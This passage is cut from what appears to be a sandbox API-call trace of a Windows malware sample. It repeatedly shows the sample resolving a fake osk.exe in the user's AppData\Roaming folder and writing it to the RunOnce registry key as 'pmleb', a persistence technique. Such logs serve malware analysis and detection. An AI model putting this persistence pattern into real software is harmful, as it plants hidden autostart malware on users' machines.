HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.145] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x67 [0080.145] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.145] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.145] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.145] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.145] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.146] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.146] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.146] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", 
cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.146] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.146] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.146] RegCloseKey (hKey=0x280) returned 0x0 [0080.146] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.146] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.147] SetTimer (hWnd=0x20280, nIDEvent=0x2067, uElapse=0xa, lpTimerFunc=0x0) returned 0x2067 [0080.147] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.160] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.160] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.160] KillTimer (hWnd=0x20280, uIDEvent=0x2067) returned 1 [0080.160] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.160] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.160] IUnknown:Release (This=0x787518) returned 0x1 [0080.160] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.161] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.161] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.161] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.161] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.161] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.161] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.161] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.161] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.161] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x68 [0080.161] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.161] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x69 [0080.161] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.162] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x68 [0080.162] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.162] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.162] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.162] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.162] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.162] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.163] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.163] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 54 [0080.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.163] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.163] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.163] RegCloseKey (hKey=0x280) returned 0x0 [0080.163] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.163] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.163] SetTimer (hWnd=0x20280, nIDEvent=0x2068, uElapse=0xa, lpTimerFunc=0x0) returned 0x2068 [0080.163] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.174] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.174] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.174] KillTimer (hWnd=0x20280, uIDEvent=0x2068) returned 1 [0080.174] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.174] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.174] IUnknown:Release (This=0x787518) returned 0x1 [0080.175] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) 
returned 0x0 [0080.175] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.175] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.175] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.175] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.175] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.175] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, 
[7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.175] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.175] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.175] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x69 [0080.175] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.176] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6a [0080.176] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.176] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x69 [0080.177] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.177] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.177] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.177] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.177] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.177] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.177] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.177] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.177] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.177] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.177] RegCloseKey (hKey=0x280) returned 0x0 [0080.178] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.178] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.178] SetTimer (hWnd=0x20280, nIDEvent=0x2069, uElapse=0xa, lpTimerFunc=0x0) returned 0x2069 [0080.178] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.189] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.189] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.190] KillTimer (hWnd=0x20280, uIDEvent=0x2069) returned 1 [0080.190] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.190] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.190] IUnknown:Release (This=0x787518) returned 0x1 [0080.190] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.190] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.190] FileSystemObject:IDispatch:Invoke (in: 
This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.191] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.191] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.191] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.191] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.191] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.191] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.191] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6a [0080.191] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.191] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6b [0080.191] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 